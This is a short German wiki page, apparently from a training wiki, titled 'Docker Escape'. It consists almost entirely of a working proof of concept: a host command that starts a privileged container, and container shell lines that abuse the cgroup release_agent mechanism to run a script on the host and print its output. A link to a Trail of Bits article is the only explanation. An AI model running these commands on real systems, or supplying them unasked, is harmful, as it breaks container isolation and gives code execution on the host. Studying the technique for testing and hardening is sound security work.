Docker Escape

Aus Xinux Wiki

Version vom 12. Juli 2021, 17:02 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „=Example= ==Host== *docker run --rm -it --privileged ubuntu bash ==Container== *d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` *mkdir -p $d/w;echo 1 >$d/w/notif…“)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Example

Host

docker run --rm -it --privileged ubuntu bash

Container

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh\nps >'"$t/o" >/c;
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

Links

https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

Abgerufen von „http://wiki.ixheim.de/index.php?title=Docker_Escape&oldid=25885“